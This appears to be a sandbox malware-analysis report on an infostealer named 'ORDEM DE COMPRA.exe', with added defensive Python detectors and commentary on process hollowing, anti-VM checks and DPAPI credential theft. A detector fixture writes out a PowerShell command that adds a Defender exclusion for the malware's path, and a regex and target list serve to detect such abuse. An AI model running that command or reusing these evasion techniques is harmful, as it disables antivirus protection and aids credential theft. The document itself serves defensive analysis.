              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1756 -s 1120
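              The process tree above reduced to two telemetry rules: the sample has PowerShell add a Defender exclusion for its own path, then starts two .NET Framework helpers (RegSvcs.exe, AddInProcess32.exe) with empty command lines, the hosts into which the payload is injected. The Python below is added here and is not part of Joe Sandbox's output; it runs both checks over constructed Sysmon-style process-creation records that mirror the tree. The hollowing-target names beyond the two seen in this report, the user-writable path prefixes, and every PID other than 1756 and 6976 are assumptions.

```python
"""Triage of process-creation telemetry for two behaviours this report
records: a Defender exclusion added through PowerShell, and .NET Framework
helper binaries started from a user-writable location, the classic setup
for PE injection ("process hollowing") into AddInProcess32.exe.

Added example, not Joe Sandbox code. The events below are constructed to
mirror the report's process tree; field names follow Sysmon Event ID 1 in
lower case, and every PID except 1756 and 6976 is made up.
"""
import re
from pathlib import PureWindowsPath

# Framework helpers that are popular hollowing targets. The first two appear
# in this report; the rest are an assumed extension for your own estate.
DOTNET_HOLLOWING_TARGETS = {
    "addinprocess32.exe", "regsvcs.exe",
    "addinprocess.exe", "regasm.exe", "installutil.exe",
}

# Locations an unprivileged user can write to (assumed list).
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

# Add-MpPreference -ExclusionPath|-ExclusionProcess|-ExclusionExtension <value>
# The value may be double-quoted, single-quoted or bare.
EXCLUSION_RE = re.compile(
    r"add-mppreference\b.*?-exclusion(?P<kind>path|process|extension)\s+"
    r"(?:\"(?P<dq>[^\"]*)\"|'(?P<sq>[^']*)'|(?P<bare>\S+))",
    re.IGNORECASE | re.DOTALL,
)


def basename(path):
    return PureWindowsPath(path).name.lower()


def user_writable(path):
    return path.lower().startswith(USER_WRITABLE_PREFIXES)


def has_arguments(cmdline):
    """True when anything follows the (possibly quoted) image path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        rest = s[end + 1:] if end != -1 else ""
    else:
        rest = s.partition(" ")[2]
    return bool(rest.strip())


def triage(events):
    """Return one finding dict per suspicious event."""
    findings = []
    for ev in events:
        image = basename(ev["image"])
        if image in ("powershell.exe", "pwsh.exe"):
            m = EXCLUSION_RE.search(ev["cmdline"])
            if m:
                excluded = m.group("dq") or m.group("sq") or m.group("bare")
                findings.append({
                    "rule": "defender_exclusion_added",
                    "pid": ev["pid"],
                    "kind": m.group("kind").lower(),
                    "excluded": excluded,
                    # the sample excludes the very file its parent runs from
                    "self_exclusion": excluded.lower() == ev["parent_image"].lower(),
                })
        if image in DOTNET_HOLLOWING_TARGETS and user_writable(ev["parent_image"]):
            findings.append({
                "rule": "dotnet_helper_from_user_writable_parent",
                "pid": ev["pid"],
                "target": image,
                "parent": ev["parent_image"],
                # A hollowed host is usually launched with an empty command line;
                # legitimate Add-In hosting passes arguments (assumed).
                "no_arguments": not has_arguments(ev["cmdline"]),
            })
    return findings


SAMPLE = r"C:\Users\user\Desktop\ORDEM DE COMPRA.exe"
FX32 = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

EVENTS = [  # constructed, mirroring the report's process tree
    {"pid": 1756, "image": SAMPLE, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": f'"{SAMPLE}"'},
    {"pid": 4012, "image": PS, "parent_image": SAMPLE,
     "cmdline": f'"{PS}" Add-MpPreference -ExclusionPath "{SAMPLE}" -Force'},
    {"pid": 4100, "image": FX32 + r"\RegSvcs.exe", "parent_image": SAMPLE,
     "cmdline": f'"{FX32}\\regsvcs.exe"'},
    {"pid": 6976, "image": FX32 + r"\AddInProcess32.exe", "parent_image": SAMPLE,
     "cmdline": f'"{FX32}\\AddInProcess32.exe"'},
    {"pid": 7012, "image": FX32 + r"\AddInProcess32.exe", "parent_image": SAMPLE,
     "cmdline": f'"{FX32}\\AddInProcess32.exe"'},
    # benign control: an installed application hosting an add-in (constructed)
    {"pid": 3100, "image": FX32 + r"\AddInProcess32.exe",
     "parent_image": r"C:\Program Files\Contoso\Host.exe",
     "cmdline": f'"{FX32}\\AddInProcess32.exe" /guid:00000000-0000-0000-0000-000000000000 /pid:3000'},
]

if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

              On a real host, feed it Sysmon Event ID 1 records (or Security 4688 with command-line auditing enabled) and treat self_exclusion as high confidence: an administrator has no reason to exclude the binary that just spawned the exclusion command.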
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (2x), cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, uxtheme.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Sections loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (2x), uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, dpapi.dll
              The load set of AddInProcess32.exe is the telling one: a Framework add-in host started with an empty command line has no work of its own, yet this instance pulls in the WinHTTP/Schannel/DNS network stack and dpapi.dll. That is the profile of the injected payload, which decrypts DPAPI-protected browser and mail credentials and sends them out over TLS, not of the benign host.
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: ORDEM DE COMPRA.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: ORDEM DE COMPRA.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: ORDEM DE COMPRA.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: WERE5FE.tmp.dmp.9.dr (WER crash dump) | Binary strings (PDB names, with adjacent bytes where the extraction kept them): System.Windows.Forms.pdb, Microsoft.VisualBasic.ni.pdb, mscorlib.pdb, System.ni.pdbRSDS, Microsoft.CSharp.pdb, System.Windows.Forms.ni.pdbRSDS, System.Dynamic.pdb, System.Windows.Forms.pdb0, System.Windows.Forms.ni.pdb, System.Drawing.pdb, mscorlib.ni.pdb, System.Drawing.ni.pdb, System.Core.pdb, mscorlib.ni.pdbRSDS7^3l, System.Drawing.pdb`, Microsoft.VisualBasic.ni.pdbRSDS&, System.Drawing.ni.pdbRSDS, System.pdbMZ, System.ni.pdb, System.pdb, System.Core.ni.pdbRSDS, System.Core.ni.pdb, Microsoft.VisualBasic.pdb
              Source: ORDEM DE COMPRA.exe | Static PE information: 0xD4FC1361 [Fri Mar 26 12:30:25 2083 UTC]
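              A check for the link timestamp above, added here as an example and not part of Joe Sandbox's output. It decodes 0xD4FC1361 the way the report does and adds the caveat a reviewer needs: a stamp with the high bit set is what deterministic .NET builds write into this field (a content hash, not a time), so a year of 2083 on a .NET sample is expected noise rather than proof that the author forged the timestamp, even though it still trips the suspicious-timestamp heuristic. The header bytes produced by build_minimal_pe() are constructed; only the stamp value is taken from the report.

```python
"""Decode and judge the COFF TimeDateStamp the report flags as suspicious.

Added example, not Joe Sandbox code. build_minimal_pe() constructs a
throw-away header so the parser can be exercised offline; only the stamp
value 0xD4FC1361 comes from the report, the other bytes are made up.
"""
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
# Roslyn (C#/VB) deterministic builds store a content hash here with the
# high bit set instead of a wall-clock time, so the decoded date is noise.
DETERMINISTIC_HIGH_BIT = 0x80000000


def build_minimal_pe(timestamp):
    """MZ header, e_lfanew at 0x3C, then 'PE\\0\\0' + a COFF header (constructed)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine=AMD64, 3 sections, TimeDateStamp, no symbols, PE32+ opt-header size,
    # Characteristics = EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE
    coff = struct.pack("<HHIIIHH", 0x8664, 3, timestamp, 0, 0, 0xF0, 0x0022)
    return dos + b"PE\x00\x00" + coff


def read_timestamp(data):
    """Return the raw TimeDateStamp from a PE image, or raise ValueError."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    # COFF header layout: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return stamp


def assess_timestamp(stamp, now_epoch):
    """Classify a stamp against a reference time given in seconds since the epoch."""
    when = EPOCH + timedelta(seconds=stamp)   # avoids platform time_t limits past 2038
    hashed = bool(stamp & DETERMINISTIC_HIGH_BIT)
    if stamp == 0:
        verdict = "zeroed: stamp was stripped or never set"
    elif hashed:
        verdict = ("not a build time: high bit set, consistent with a deterministic "
                   ".NET build; do not read the calendar date as tampering by itself")
    elif stamp > now_epoch:
        verdict = "future date: forged stamp or badly skewed build clock"
    else:
        verdict = "plausible build time"
    return {
        "raw": stamp,
        "utc": when,
        "iso": when.strftime("%Y-%m-%d %H:%M:%S UTC"),
        "in_future": stamp > now_epoch,
        "deterministic_build_hash": hashed,
        "verdict": verdict,
    }


if __name__ == "__main__":
    import time
    pe = build_minimal_pe(0xD4FC1361)
    print(assess_timestamp(read_timestamp(pe), int(time.time())))
```

              For the value in this report both flags are set: the date is in the future and the high bit is set, so the honest reading is "deterministic build, date meaningless", and the evasion evidence has to come from the other signatures (Defender exclusion, injection, anti-VM strings), not from this field.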
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD348ADF45 push BA495F4Dh; iretd 0_2_00007FFD348ADF6A
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD348A00BD pushad ; iretd 0_2_00007FFD348A00C1
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD349C0261 push esp; retf 4810h 0_2_00007FFD349C0552
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD349C0224 pushad ; ret 0_2_00007FFD349C0225
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F69770 push esp; ret 5_2_02F69771
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A68F86 push es; iretd 5_2_06A6903C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A67C3D push es; ret 5_2_06A67C50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A69000 push es; iretd 5_2_06A6903C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7367B push es; iretd 5_2_06A7367C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7F75F push es; ret 5_2_06A7F888
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7F88B push es; ret 5_2_06A7F888
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A79045 push es; ret 5_2_06A7904C

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 occurrences)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 occurrences)
              These manifest reads are the expected side effect of PowerShell's module auto-loading: Add-MpPreference is not in an already-loaded module, so command discovery scans the manifests under $PSModulePath, BitLocker's among them. Only the reads are recorded here; there is no BitLocker cmdlet in the command line the sample ran.
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTR
Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Memory allocated: 1FBD9590000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Memory allocated: 1FBF1710000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Memory allocated: 2E70000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Memory allocated: 30B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Memory allocated: 2EC0000 memory reserve | memory write watch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 599766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 599641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 599529
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 599422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 599312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 599203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 599094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598316
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598187
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597134
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 595906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 595797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 595687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 595578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 595469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 595359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 595250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 595141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 595016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 594891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 594780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 594672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 594562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 594453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 594344
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7098
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Window / User API: threadDelayed 7640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Window / User API: threadDelayed 2198
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252 | Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep count: 35 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -599875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5056 | Thread sleep count: 7640 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -599766s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5056 | Thread sleep count: 2198 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -599641s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -599529s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -599422s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -599312s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -599203s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -599094s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -598984s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -598875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -598766s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -598656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -598547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -598437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -598316s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -598187s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -598078s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -597969s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -597859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -597750s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -597641s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -597531s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -597422s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -597312s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -597134s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -597008s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -596906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -596797s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -596687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -596577s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -596469s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -596344s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -596234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -596125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -596015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -595906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -595797s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -595687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -595578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -595469s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -595359s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -595250s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -595141s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -595016s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -594891s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -594780s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -594672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -594562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -594453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096 | Thread sleep time: -594344s >= -30000s
Source: Amcache.hve.9.dr | Binary or memory string: VMware
